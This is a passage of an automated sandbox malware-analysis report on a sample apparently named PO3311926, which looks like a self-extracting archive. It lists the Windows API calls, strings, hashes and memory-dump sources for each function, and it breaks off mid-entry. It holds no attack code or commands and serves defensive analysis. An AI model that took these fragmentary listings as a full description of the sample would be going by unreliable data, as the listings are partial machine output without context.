                                                                                              • Instruction ID: 9fed498fb4b6d15d9c02f975efae21de5edbabd3b35c9eb27e07a1dd1296901b
                                                                                              • Opcode Fuzzy Hash: c832522fcfa827e638db54d4cb073594dd29f906122c4957e827083841a67f0d
                                                                                              • Instruction Fuzzy Hash: 99F0A43614160166E6523324BC6EF1B1BE5DFD2BB1F3501BDF525A71D2FE20CC018665
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BBDC47
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBDC61
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBDC72
                                                                                              • TranslateMessage.USER32(?), ref: 00BBDC7C
                                                                                              • DispatchMessageW.USER32(?), ref: 00BBDC86
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BBDC91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: b9804b4e6a0f3b260673858df70302aed0069321a75dab89e15b3bac6ee0cb3c
                                                                                              • Instruction ID: 78a12144b745fffa4e13cb91ee93bb530f315df3bce6f2b8c1d9f8103f0c3ff6
                                                                                              • Opcode Fuzzy Hash: b9804b4e6a0f3b260673858df70302aed0069321a75dab89e15b3bac6ee0cb3c
                                                                                              • Instruction Fuzzy Hash: 56F03C72A02219BBCB216BA5DC4CFDFBFADEF41795B004011B50AE2051E6798646CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0
                                                                                                • Part of subcall function 00BAB92D: _wcsrchr.LIBVCRUNTIME ref: 00BAB944
                                                                                              • _wcslen.LIBCMT ref: 00BAC197
                                                                                              • _wcslen.LIBCMT ref: 00BAC1DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: 01652379f058de3e19146f10f89ed5c1e6be2bf02e21aaba18bbd4cd1f718565
                                                                                              • Instruction ID: 0b045736a7b87cd6ff0e963b6642c0bd2732e6e710cbe882fd5357562d0aba9a
                                                                                              • Opcode Fuzzy Hash: 01652379f058de3e19146f10f89ed5c1e6be2bf02e21aaba18bbd4cd1f718565
                                                                                              • Instruction Fuzzy Hash: 1A412A2564831196C732AF748852E7BBBF4EF43B44F1449CEF9966B182FB904D85C391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00BABB27
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BAA275,?,?,00000800,?,00BAA23A,?,00BA755C), ref: 00BABBC5
                                                                                              • _wcslen.LIBCMT ref: 00BABC3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: 083d1341d56deab590882e2048c7034f7447a2576eabfb7bfea8119d6da22a3d
                                                                                              • Instruction ID: e89c0ffceaa6183a7b8bfe5bcff9677875db6bfa8b885ccbf296be9484639b7f
                                                                                              • Opcode Fuzzy Hash: 083d1341d56deab590882e2048c7034f7447a2576eabfb7bfea8119d6da22a3d
                                                                                              • Instruction Fuzzy Hash: FE416231444215BACB21AF60CC45EFF7BE9EF467A0F1045E6F965A3153FBB0DA908A60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00BBB6ED
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00BBB712
                                                                                              • DeleteObject.GDI32(00000000), ref: 00BBB744
                                                                                              • DeleteObject.GDI32(00000000), ref: 00BBB767
                                                                                                • Part of subcall function 00BBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6D5
                                                                                                • Part of subcall function 00BBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6EC
                                                                                                • Part of subcall function 00BBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA703
                                                                                                • Part of subcall function 00BBA6C2: LockResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA712
                                                                                                • Part of subcall function 00BBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA72D
                                                                                                • Part of subcall function 00BBA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA73E
                                                                                                • Part of subcall function 00BBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BBA7A7
                                                                                                • Part of subcall function 00BBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BBA7C6
                                                                                                • Part of subcall function 00BBA6C2: GlobalFree.KERNEL32(00000000), ref: 00BBA7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1428510222-3352871620
                                                                                              • Opcode ID: d9564c826ae7f8d967ceac652abcecf3245aa368bc282e5302f884e47ef05022
                                                                                              • Instruction ID: 5713d809ba25806e04cdd360cca54e7b03219e177a1c365ec87e8512d652c941
                                                                                              • Opcode Fuzzy Hash: d9564c826ae7f8d967ceac652abcecf3245aa368bc282e5302f884e47ef05022
                                                                                              • Instruction Fuzzy Hash: B601AD369002016BC72267799C49FFF7AFAAFC0B56F190091B900A7291EFE18D0582A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
                                                                                                • Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00BBD64B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BBD661
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BBD675
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00BBD684
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 41edabf13cbd1f0af5f0c6d3b44be31e53aa596c9cd9f2dd84bc23fe406aa9c4
                                                                                              • Instruction ID: 1eea9ac0aea701906623a5d32e210a072db1c1895ea0f6781ebcfee5ab8d4691
                                                                                              • Opcode Fuzzy Hash: 41edabf13cbd1f0af5f0c6d3b44be31e53aa596c9cd9f2dd84bc23fe406aa9c4
                                                                                              • Instruction Fuzzy Hash: 0201F133285214BBD2204F689D49FBB7BDCEB9AB01F020452F306A2090DAE69904CB79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC7E24,?,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002), ref: 00BC7E93
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC7EA6
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00BC7E24,?,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002,00000000), ref: 00BC7EC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: a3f82c6c0a02b81b319058ee9982c2afc2275f4a97f5e86cdb2d0f0c984827da
                                                                                              • Instruction ID: c2ccf2f9c4d35353609c96e3a5b080fa7fb9778e54bd0150ac87ccd1409ea632
                                                                                              • Opcode Fuzzy Hash: a3f82c6c0a02b81b319058ee9982c2afc2275f4a97f5e86cdb2d0f0c984827da
                                                                                              • Instruction Fuzzy Hash: 1AF03135941209BBCB119BA0DC19BAEFFF8EB44711F0040EAE805A3261EF709E40CA95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
                                                                                                • Part of subcall function 00BB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BAF2E4
                                                                                              • GetProcAddress.KERNEL32(00BE81C8,CryptUnprotectMemory), ref: 00BAF2F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: aafa88250a66a42e15a5b22d79cf1f72aee9f825bfc9e849ba26ef9991dee0dd
                                                                                              • Instruction ID: ac47e26c9fe55e51c75d283c5e88b7c7b18b2f58dc23a8658c175f1eebe03da1
                                                                                              • Opcode Fuzzy Hash: aafa88250a66a42e15a5b22d79cf1f72aee9f825bfc9e849ba26ef9991dee0dd
                                                                                              • Instruction Fuzzy Hash: 29E02674A10702AECB209F74981CB56FBD4AF04F00F04C8AFF0CA93362EAB0D1408B21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: ed09156325c388f4c54cfc756321cdcd686bced47ffced61561f2ff7a8561960
                                                                                              • Instruction ID: 9cdc9c729f5fee7e49f223c312a2acd4c4c81cc15e2a05b8c23c8b6d88156225
                                                                                              • Opcode Fuzzy Hash: ed09156325c388f4c54cfc756321cdcd686bced47ffced61561f2ff7a8561960
                                                                                              • Instruction Fuzzy Hash: A451B071600216AFDB299F18D885FBAB7E4FF64710F2445ADEC02476A1E731ED40DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00BCBF39
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BCBF5C
                                                                                                • Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BCBF82
                                                                                              • _free.LIBCMT ref: 00BCBF95
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BCBFA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: f8d2f8c4a94e996ee9eeb2cd739e01e24ba75b8716717fd7a48d53862c586b59
                                                                                              • Instruction ID: b1d6fb4c2773f96f2a32c03a6d29f3590da0c1ebd942fa7319f3c98053fef3ff
                                                                                              • Opcode Fuzzy Hash: f8d2f8c4a94e996ee9eeb2cd739e01e24ba75b8716717fd7a48d53862c586b59
                                                                                              • Instruction Fuzzy Hash: D901D472A022127F2321167A5CAEE7FABEDDEC2FA171401ADF914D3201EF608D0195B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,00BC91AD,00BCB188,?,00BC9813,00000001,00000364,?,00BC40EF,?,?,00BE1098), ref: 00BC986E
                                                                                              • _free.LIBCMT ref: 00BC98A3
                                                                                              • _free.LIBCMT ref: 00BC98CA
                                                                                              • SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC98D7
                                                                                              • SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC98E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: e2ad0ecdd2f1dbfe8ec31b5b1ae6b477f08a99ddf30f8ce0c46c86acc5b90cdf
                                                                                              • Instruction ID: 8b37b9e761f96fa36876dfe06ebfc70e7b3aeddf3c643829af7f3169490f34f2
                                                                                              • Opcode Fuzzy Hash: e2ad0ecdd2f1dbfe8ec31b5b1ae6b477f08a99ddf30f8ce0c46c86acc5b90cdf
                                                                                              • Instruction Fuzzy Hash: 8001F4362466026BE3127768ACADF1B27E9DBD2BB073101BEF515A7192FE20CC015275
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BB11CF: ResetEvent.KERNEL32(?), ref: 00BB11E1
                                                                                                • Part of subcall function 00BB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BB11F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BB0F21
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00BB0F3B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00BB0F54
                                                                                              • CloseHandle.KERNEL32(?), ref: 00BB0F60
                                                                                              • CloseHandle.KERNEL32(?), ref: 00BB0F6C
                                                                                                • Part of subcall function 00BB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BB1101,?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FEA
                                                                                                • Part of subcall function 00BB0FE4: GetLastError.KERNEL32(?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: c151f4299ba0205344f1fc27c0a6569db2e6945d7f2ed4ef10cd4d5e2e066cf2
                                                                                              • Instruction ID: 15cdf4d235dd55d0ca6aeea84a7e8ccd72dd7f1d34caa3ba72c1ed5e892434db
                                                                                              • Opcode Fuzzy Hash: c151f4299ba0205344f1fc27c0a6569db2e6945d7f2ed4ef10cd4d5e2e066cf2
                                                                                              • Instruction Fuzzy Hash: 83017172501744EFC722AF64DC84BE6FBE9FB08B10F00096AF26B92161DBB57A45CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00BCC817
                                                                                                • Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
                                                                                                • Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4
                                                                                              • _free.LIBCMT ref: 00BCC829
                                                                                              • _free.LIBCMT ref: 00BCC83B
                                                                                              • _free.LIBCMT ref: 00BCC84D
                                                                                              • _free.LIBCMT ref: 00BCC85F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 59a10e2767e8b3da2b711d53a92dc9aa19852f7171476882d2239fdba1ea79b9
                                                                                              • Instruction ID: a75f50d95db3b7a728dbc13d6ba2457c99bcf59e15df5ce856950491705e0202
                                                                                              • Opcode Fuzzy Hash: 59a10e2767e8b3da2b711d53a92dc9aa19852f7171476882d2239fdba1ea79b9
                                                                                              • Instruction Fuzzy Hash: ACF01232505200ABC660EB68F485E27B7E9EA1071475518AEF15DDB592DF70FC80CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00BB1FE5
                                                                                              • _wcslen.LIBCMT ref: 00BB1FF6
                                                                                              • _wcslen.LIBCMT ref: 00BB2006
                                                                                              • _wcslen.LIBCMT ref: 00BB2014
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BAB371,?,?,00000000,?,?,?), ref: 00BB202F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
